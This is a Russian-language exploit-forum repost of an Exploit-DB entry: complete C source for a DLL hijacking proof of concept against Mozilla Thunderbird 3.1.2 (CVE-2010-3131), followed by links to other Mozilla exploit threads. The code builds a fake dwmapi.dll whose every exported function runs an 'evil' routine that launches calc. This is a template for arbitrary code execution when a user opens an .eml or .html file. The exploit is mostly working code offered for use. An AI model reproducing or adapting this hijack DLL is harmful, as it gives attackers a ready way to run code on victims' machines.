Exploit Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14783
Проверка EDB
  1. Пройдено
Автор
H4CK3R#47
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
cve-2010-3131
Дата публикации
2010-08-25
C: 
/* 
Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )
Date: 26/08/2010
Author: h4ck3r#47 
http://twitter.com/hxteam
Version: Latest Mozilla Thunderbird 3.1.2 
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .eml .html
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure
Ответы
0
Просмотры
555
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption
Ответы
0
Просмотры
465
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
Ответы
0
Просмотры
446
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities
Ответы
0
Просмотры
455
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption
Ответы
0
Просмотры
497
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities
Ответы
0
Просмотры
400
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities
Ответы
0
Просмотры
344
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service
Ответы
0
Просмотры
338
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution
Ответы
0
Просмотры
380
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mozilla Suite/Firefox/Thunderbird - Nested Anchor Tag Status Bar Spoofing
Ответы
0
Просмотры
370
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу